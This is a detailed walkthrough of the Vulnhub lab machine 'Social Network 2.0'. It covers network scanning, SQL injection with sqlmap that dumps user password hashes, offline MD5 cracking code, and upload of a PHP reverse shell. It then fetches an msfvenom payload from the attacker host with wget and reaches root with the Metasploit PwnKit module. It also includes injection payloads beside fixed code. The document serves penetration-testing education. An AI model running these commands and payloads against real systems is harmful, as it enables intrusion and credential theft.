Vulnhub: BoredHackerBlog: Social Network 2.0 detailed walkthrough

Socnet

Author: jason huawen

Target information

Name: BoredHackerBlog: Social Network 2.0

URL:

https://www.vulnhub.com/entry/boredhackerblog-social-network-20,455/

Identifying the target host's IP address

(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:26:b1:cb      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.169  08:00:27:5b:b3:1b      1      60  PCS Systemtechnik GmbH                                                                                   


netdiscover on Kali identifies the target host as 192.168.56.169. In VirtualBox's default host-only layout 192.168.56.1 is the host adapter and 192.168.56.100 the built-in DHCP server, which leaves .169 as the only candidate.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.169 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-22 21:56 EDT
Nmap scan report for bogon (192.168.56.169)
Host is up (0.00040s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:d3:4e:54:fe:66:3e:f3:b2:a5:4b:51:9f:5f:f9:c6 (RSA)
|   256 de:86:ef:76:93:63:74:83:00:b1:a3:b8:c2:4c:8f:58 (ECDSA)
|_  256 b5:ec:f1:1e:9a:5a:5c:d7:02:3a:9e:1b:f7:c8:b4:53 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Social Network
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
8000/tcp open  http    BaseHTTPServer 0.3 (Python 2.7.15rc1)
|_http-server-header: BaseHTTP/0.3 Python/2.7.15rc1
|_xmlrpc-methods: XMLRPC instance doesn't support introspection.
|_http-title: Error response
MAC Address: 08:00:27:5B:B3:1B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds

Nmap shows three open ports: 22 (ssh), 80 (http, Apache 2.4.29 on Ubuntu) and 8000 (http). Two details on 8000 matter later: the banner is Python 2.7's BaseHTTPServer, and the xmlrpc-methods script fired against it, so it is an XML-RPC endpoint rather than an ordinary web server.

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ nikto -h http://192.168.56.169
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.169
+ Target Hostname:    192.168.56.169
+ Target Port:        80
+ Start Time:         2023-04-22 22:00:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /data/: Directory indexing found.
+ OSVDB-3092: /data/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3268: /database/: Directory indexing found.
+ OSVDB-3093: /database/: Databases? Really??
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2023-04-22 22:01:42 (GMT-4) (63 seconds)
---------------------------------------------------------------------------

Nikto reports directory indexing on /database/; it holds two .sql files, which we download locally.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ cat DML.sql 
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
       VALUES ("Armin", "Virgil", "armin@gmail.com", "M", "2001-02-05");
INSERT INTO users(user_firstname, user_lastname, user_nickname, user_password, user_email, user_gender, user_birthdate, user_status)
       VALUES ("Paul", "James", "Pynch", "paul@gmail.com", "M", "1998-12-19", "S");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
       VALUES ("Chris", "Wilson", "chris@gmail.com", "M", "1996-01-18");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate, user_status)
       VALUES ("Rory", "Blue", "rory@gmail.com", "F", "1994-04-18", "M");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
       VALUES ("Andrea", "Surman", "andrea@gmail.com", "M", "1994-06-06");

The INSERT statements list user_password among the columns but supply no value for it, so the column and value counts do not match (the first statement names six columns and gives five values). These statements would fail as written and contain no credentials; the file is a dead end.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ gobuster dir -u http://192.168.56.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.txt,.js,.bak        
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.169
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,js,txt,bak
[+] Timeout:                 10s
===============================================================
2023/04/22 22:06:30 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.169/images/]
/.html                (Status: 403) [Size: 294]
/index.php            (Status: 200) [Size: 10609]
/search.php           (Status: 302) [Size: 1490] [--> index.php]
/home.php             (Status: 302) [Size: 4234] [--> index.php]
/resources            (Status: 301) [Size: 320] [--> http://192.168.56.169/resources/]
/profile.php          (Status: 302) [Size: 2845] [--> index.php]
/data                 (Status: 301) [Size: 315] [--> http://192.168.56.169/data/]
/includes             (Status: 301) [Size: 319] [--> http://192.168.56.169/includes/]
/friends.php          (Status: 302) [Size: 1669] [--> index.php]
/database             (Status: 301) [Size: 319] [--> http://192.168.56.169/database/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/functions            (Status: 301) [Size: 320] [--> http://192.168.56.169/functions/]
/requests.php         (Status: 302) [Size: 1719] [--> index.php]
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 302]
Progress: 1322305 / 1323366 (99.92%)
===============================================================

Gobuster adds little beyond Nikto: /functions/ and /resources/, plus the application pages (home.php, profile.php, search.php, friends.php, requests.php), all of which redirect to index.php until you are logged in. Nothing here is exploitable without an account.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ curl http://192.168.56.169:8000/     
<head>
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code 501.
<p>Message: Unsupported method ('GET').
<p>Error code explanation: 501 = Server does not support this operation.
</body>

GET is not supported, so intercept the request in Burp Suite and resend it as POST.

The POST comes back with an empty body.

Gobuster can also be pointed at port 8000 with the -m flag set to POST, but the Nmap fingerprint already explains the behaviour: the xmlrpc-methods script ran against this port and reported that the instance does not support introspection, so this is almost certainly a Python 2.7 SimpleXMLRPCServer (built on BaseHTTPServer, hence the 501 for GET). It only answers POST requests carrying an XML-RPC body, and with system.listMethods disabled the only way to find methods is to guess names. The rest of this walkthrough goes in through port 80 instead.
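An added example (not from the original post or the target's code) of how to probe an endpoint that behaves like port 8000: it reproduces the 501 for GET, shows the fault you get when system.listMethods is not registered, and falls back to guessing method names. The server it talks to is a constructed loopback stand-in with one hypothetical method called status; the candidate names in the guess list are assumptions, not methods known to exist on the target.

```python
import http.client
import threading
import xmlrpc.client
from urllib.parse import urlparse
from xmlrpc.server import SimpleXMLRPCServer


def http_get_status(url):
    """Plain GET, as curl did above; returns the HTTP status code."""
    u = urlparse(url)
    conn = http.client.HTTPConnection(u.hostname, u.port, timeout=5)
    conn.request("GET", u.path or "/")
    status = conn.getresponse().status
    conn.close()
    return status


def list_methods(url):
    """Try system.listMethods; returns the list on success, or the fault
    string when introspection is not registered (as on the target)."""
    proxy = xmlrpc.client.ServerProxy(url)
    try:
        return proxy.system.listMethods()
    except xmlrpc.client.Fault as fault:
        return fault.faultString


def guess_methods(url, candidates):
    """With introspection off, call candidate names with no arguments.
    SimpleXMLRPCServer answers an unknown name with a fault containing
    'is not supported'; any other reply (a value, or a TypeError fault
    because the arguments were wrong) means the method exists."""
    proxy = xmlrpc.client.ServerProxy(url)
    present = []
    for name in candidates:
        try:
            getattr(proxy, name)()
            present.append(name)
        except xmlrpc.client.Fault as fault:
            if "is not supported" not in fault.faultString:
                present.append(name)
    return present


def start_demo_server():
    """Constructed stand-in for the target, not the real service: a loopback
    SimpleXMLRPCServer with no introspection registered and one hypothetical
    method named 'status'. Returns (server, url)."""
    srv = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
    srv.register_function(lambda: "ok", "status")
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/" % srv.server_address[1]


if __name__ == "__main__":
    srv, url = start_demo_server()
    print("GET /           ->", http_get_status(url))
    print("listMethods     ->", list_methods(url))
    print("guessed methods ->", guess_methods(url, ["status", "ping", "exec"]))
    srv.shutdown()
```

Against the real box you would drop start_demo_server and pass http://192.168.56.169:8000/ to the three probe functions; a method that exists but is called with the wrong arguments still shows up, because the fault text differs from the "not supported" one.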

Register a new user and log in. The search feature looks like a candidate for SQL injection, so intercept the search request in Burp Suite and save it to a file (req.txt) for sqlmap.

http://192.168.56.169/search.php?location=emails&query=test
(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3

sqlmap confirms that the search request is injectable.

─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 --dbs
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] socialnetwork
[*] sys

─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork --tables
Database: socialnetwork
[4 tables]
+------------+
| friendship |
| posts      |
| user_phone |
| users      |
+------------+

─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users --columns
Database: socialnetwork
Table: users
[11 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| user_about     | text         |
| user_birthdate | date         |
| user_email     | varchar(255) |
| user_firstname | varchar(20)  |
| user_gender    | char(1)      |
| user_hometown  | varchar(255) |
| user_id        | int(11)      |
| user_lastname  | varchar(20)  |
| user_nickname  | varchar(20)  |
| user_password  | varchar(255) |
| user_status    | char(1)      |
+----------------+--------------+

─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users -C user_email,user_password --dump
Table: users
[3 entries]
+------------------------+----------------------------------+
| user_email             | user_password                    |
+------------------------+----------------------------------+
| admin@localhost.com    | 21232f297a57a5a743894a0e4a801fc3 |
| testuser@localhost.com | 5d9c68c6c50ed3d02a2fcf54f63993b6 |
| test@test.com          | e10adc3949ba59abbe56e057f20f883e |
+------------------------+----------------------------------+
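An added example, not code from the original post or from the Social Network application, of what sqlmap established above. search.php's source is not shown, so the query shape (the location parameter selects a column and query lands inside a LIKE pattern) is an assumption; the in-memory table is constructed, with only the e-mail/hash pairs taken from the sqlmap dump. The vulnerable function sits beside the fixed one, together with the boolean probe sqlmap uses to detect injection and a UNION payload that retrieves the same columns as --dump.

```python
import sqlite3

# Constructed stand-in for socialnetwork.users: the e-mail/hash pairs are the
# ones sqlmap dumped above, the other columns are made up.
SAMPLE_USERS = [
    (1, "Site", "Admin", "admin@localhost.com", "21232f297a57a5a743894a0e4a801fc3"),
    (2, "Test", "User", "testuser@localhost.com", "5d9c68c6c50ed3d02a2fcf54f63993b6"),
    (3, "Test", "Test", "test@test.com", "e10adc3949ba59abbe56e057f20f883e"),
]

# Assumed meaning of the `location` parameter; search.php's source is not shown.
LOCATIONS = {"emails": "user_email", "names": "user_firstname"}


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER, user_firstname TEXT, "
        "user_lastname TEXT, user_email TEXT, user_password TEXT)"
    )
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return db


def search_vulnerable(db, location, query):
    """Assumed shape of search.php: `query` is pasted into the LIKE pattern."""
    column = LOCATIONS[location]
    sql = f"SELECT user_firstname, user_lastname FROM users WHERE {column} LIKE '%{query}%'"
    return db.execute(sql).fetchall()


def search_safe(db, location, query):
    """Fixed version: the column comes from an allow-list (identifiers cannot
    be bound) and the pattern is a bound parameter, never part of the SQL text."""
    column = LOCATIONS.get(location)
    if column is None:
        raise ValueError("unknown search location")
    sql = f"SELECT user_firstname, user_lastname FROM users WHERE {column} LIKE ?"
    return db.execute(sql, (f"%{query}%",)).fetchall()


def boolean_probe(search_fn, db, location="emails"):
    """What sqlmap's boolean-based check does: send one always-true and one
    always-false condition; if the row counts differ, the input reached the
    SQL parser instead of staying inside the string literal."""
    true_rows = search_fn(db, location, "' OR 1=1-- ")
    false_rows = search_fn(db, location, "' AND 1=0-- ")
    return len(true_rows) != len(false_rows)


# Same columns sqlmap pulled with --dump, retrieved through a single UNION
DUMP_PAYLOAD = "x%' UNION SELECT user_email, user_password FROM users-- "


if __name__ == "__main__":
    db = make_db()
    print("vulnerable injectable:", boolean_probe(search_vulnerable, db))
    print("fixed injectable:     ", boolean_probe(search_safe, db))
    for email, pw_hash in search_vulnerable(db, "emails", DUMP_PAYLOAD):
        print(email, pw_hash)
    print("fixed with same payload:", search_safe(db, "emails", DUMP_PAYLOAD))
```

The trailing space after the comment marker in the payloads is deliberate: MySQL requires whitespace after `--`, and SQLite tolerates it, so the same string works against both.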


The hashes are 32 hex characters, i.e. unsalted MD5. An online hash-lookup site resolves admin@localhost.com to admin (a local wordlist attack with hashcat -m 0 or john --format=raw-md5 gets the same result without pasting a target's hashes into a third-party site). Logging in as admin works, and the profile page allows an image upload, so the next test is whether shell.php can be uploaded.
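The offline equivalent of the online lookup, as an added example that is not part of the original post: the three hashes are exactly those dumped above, while the wordlist is a constructed stand-in for rockyou.txt. Because the hashes are unsalted, every candidate word is hashed once and all targets are looked up in the resulting table, which is also why unsalted MD5 for passwords is a finding in its own right.

```python
import hashlib
import re

# The three hashes exactly as sqlmap dumped them from socialnetwork.users
DUMPED = {
    "admin@localhost.com": "21232f297a57a5a743894a0e4a801fc3",
    "testuser@localhost.com": "5d9c68c6c50ed3d02a2fcf54f63993b6",
    "test@test.com": "e10adc3949ba59abbe56e057f20f883e",
}

# Constructed mini wordlist; in practice feed load_wordlist("rockyou.txt")
WORDLIST = ["password", "123456", "admin", "letmein", "testuser", "qwerty", "admin123"]


def hash_shape(h):
    """Length/alphabet check; 32 hex chars is the shape of MD5 (also NTLM/MD4),
    which is enough to pick the hash mode before cracking."""
    if not re.fullmatch(r"[0-9a-fA-F]+", h):
        return "unknown"
    return {32: "md5", 40: "sha1", 64: "sha256"}.get(len(h), "unknown")


def crack(hashes, wordlist, algo="md5"):
    """Unsalted hashes: hash every candidate once and look the targets up in a
    dict, so cost is O(len(wordlist)) regardless of how many hashes were dumped.
    Returns {user: plaintext or None}."""
    table = {hashlib.new(algo, word.encode()).hexdigest(): word for word in wordlist}
    return {user: table.get(h.lower()) for user, h in hashes.items()}


def load_wordlist(path):
    """Streaming reader for a real wordlist file (rockyou.txt is latin-1)."""
    with open(path, encoding="latin-1", errors="ignore") as fh:
        for line in fh:
            yield line.rstrip("\n")


if __name__ == "__main__":
    print({user: hash_shape(h) for user, h in DUMPED.items()})
    for user, plain in crack(DUMPED, WORDLIST).items():
        print(f"{user}: {plain if plain else '<not in wordlist>'}")
```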

There is no server-side validation of the upload at all: shell.php (a PHP reverse shell pointed at the attacker's 192.168.56.230:5555) is accepted, and requesting it from the web root hands a reverse shell to the listener below. Start the listener before requesting the file.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo nc -nlvp 5555                                                                      
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.169] 38434
Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 02:40:11 up 47 min,  0 users,  load average: 0.05, 0.31, 0.75
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@socnet2:/$ cd /home
cd /home
www-data@socnet2:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K Oct 29  2018 .
drwxr-xr-x 25 root   root   4.0K Oct 29  2018 ..
drwxr-xr-x  6 socnet socnet 4.0K Oct 29  2018 socnet

Privilege escalation

──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ msfvenom -p  linux/x86/meterpreter/reverse_tcp  LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf

After generating the payload, serve it over HTTP from the attacker (port 8000) and fetch it into /tmp on the target.

www-data@socnet2:/tmp$ wget http://192.168.56.230:8000/escalate.elf
wget http://192.168.56.230:8000/escalate.elf
--2023-04-23 02:55:00--  http://192.168.56.230:8000/escalate.elf
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: 'escalate.elf'

escalate.elf        100%[===================>]     207  --.-KB/s    in 0s      

2023-04-23 02:55:00 (39.3 MB/s) - 'escalate.elf' saved [207/207]

www-data@socnet2:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf

Running the ELF (with a matching multi/handler on 6666) yields a Meterpreter session; local_exploit_suggester is then run against that session to find an applicable privilege-escalation module.

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.169 - Collecting local exploits for x86/linux...
[*] 192.168.56.169 - 167 exploit checks are being tried...
[+] 192.168.56.169 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.169 - exploit/linux/local/nested_namespace_idmap_limit_priv_esc: The target appears to be vulnerable.
[+] 192.168.56.169 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.56.169 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.169 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.169 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options 

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64


msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.230:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.dmofmj
[+] The target is vulnerable.
[*] Writing '/tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.ebvnqpec
[*] Sending stage (3020772 bytes) to 192.168.56.169
[+] Deleted /tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so
[+] Deleted /tmp/.ebvnqpec/.omnoepjvoqxi
[+] Deleted /tmp/.ebvnqpec
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.169:33970) at 2023-04-23 02:30:11 -0400

meterpreter > shell
Process 1899 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 32K
drwx------  4 root root 4.0K Oct 29  2018 .
drwxr-xr-x 25 root root 4.0K Oct 29  2018 ..
-rw-------  1 root root    5 Oct 29  2018 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4.0K Oct 29  2018 .local
-rw-------  1 root root  128 Oct 29  2018 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Oct 29  2018 .ssh

At this point we have a root shell. The /root listing shows no flag file, but .mysql_history and .ssh/ are worth reading for further credentials. Two housekeeping notes from the exploit output: the module warned "Verify cleanup of /tmp/.dmofmj" and /tmp/.ebvnqpec, so check that those directories are gone, and escalate.elf in /tmp was placed by us and should be removed as well.
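A manual version of the check local_exploit_suggester performed for CVE-2021-4034, as an added example that is not part of the original post or of the Metasploit module: it verifies the two prerequisites the exploit depends on, a setuid-root pkexec and a version from before the upstream fix in polkit 0.120. The caveat is in the code: Ubuntu 18.04 shipped the fix as a backport without changing the 0.105 version string, so a vulnerable-looking version is a lead, not proof, and the module's own check (or the running exploit) is what settles it. The path /usr/bin/pkexec is the normal Debian/Ubuntu location and is an assumption about the target.

```python
import os
import re
import stat
import subprocess

# Upstream polkit fixed CVE-2021-4034 in 0.120. Distributions (Ubuntu 18.04
# among them) backported the fix without bumping 0.105, so treat a version
# below this as "unpatched unless proven otherwise", not as confirmed.
FIXED_UPSTREAM = (0, 120)


def parse_pkexec_version(text):
    """Turn 'pkexec version 0.105' into (0, 105); None if it does not match."""
    m = re.search(r"pkexec version (\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def upstream_vulnerable(version):
    """True when the reported version predates the upstream fix."""
    return version is not None and version < FIXED_UPSTREAM


def is_setuid_root(path):
    """PwnKit needs pkexec to be setuid and owned by root."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0


def check_pkexec(path="/usr/bin/pkexec"):
    """Collect the facts the exploit relies on and return them as a dict.
    Assumes pkexec lives at the usual Debian/Ubuntu path."""
    result = {
        "present": os.path.exists(path),
        "setuid_root": is_setuid_root(path),
        "version": None,
    }
    if result["present"]:
        try:
            out = subprocess.run(
                [path, "--version"], capture_output=True, text=True, timeout=5
            ).stdout
            result["version"] = parse_pkexec_version(out)
        except (OSError, subprocess.SubprocessError):
            pass
    result["likely_vulnerable"] = (
        result["setuid_root"] and upstream_vulnerable(result["version"])
    )
    return result


if __name__ == "__main__":
    for key, value in check_pkexec().items():
        print(f"{key}: {value}")
```

On the target, which is an Ubuntu 18.04 image built in October 2018, pkexec reports 0.105 and predates the January 2022 backport, which is why the suggester's check came back "The target is vulnerable" and the exploit succeeded.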

Posted 2023-04-23 14:38 by Jason_huawen